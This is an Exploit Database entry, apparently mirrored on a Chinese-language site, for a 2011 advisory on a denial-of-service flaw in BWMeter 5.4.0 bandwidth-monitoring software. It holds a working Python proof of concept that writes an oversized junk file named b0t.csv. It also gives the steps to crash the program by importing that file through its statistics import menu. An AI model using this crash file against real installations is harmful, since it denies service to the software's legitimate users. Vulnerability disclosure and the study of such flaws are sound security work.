BWMeter 5.4.0 – ‘.csv’ Denial of Service

• Exploit Database
• 110 阅读

• 作者： b0telh0
  日期： 2011-02-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16180/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

  GotGeek Labs http://www.gotgeek.com.br/   BWMeter v5.4.0 (.csv) Denial of Service       [+] Description   BWMeter is a powerful bandwidth meter, monitor, traffic controller and firewall, which measures, displays and controls all traffic to/from your computer or on your network.       [+] Information   Title: BWMeter v5.4.0 (.csv) Denial of Service Advisory: gg-002-2011 Date: 02-14-2011 Last update: 02-16-2011 Link: http://www.gotgeek.com.br/pocs/gg-002-2011.txt Tested on: Windows XP SP3       [+] Vulnerability   BWMeter is affected by denial of service vulnerability. Successful exploitation of the vulnerability allows an attacker to crash the vulnerable application, denying service to legitimate users.   Affected Versions: BWMeter v5.4.0   Other versions may also be vulnerable.       [+] Proof of Concept/Exploit   #!/usr/bin/python #     junk = "\x47\x47" * 2500   try: file = open('b0t.csv','w'); file.write(junk); file.close(); print "\n[*] gotgeek labs" print "[*] http://gotgeek.com.br\n" print "[+] b0t.csv created." print "[+] Open BWMeter.exe..." print "[+] Statistics >> Import" print "[+] and Select b0t.csv\n" except: print "\n[-] Error.. Can't write file to system.\n"       [+] References   http://www.desksoft.com/BWMeter.htm       [+] Credits   b0telh0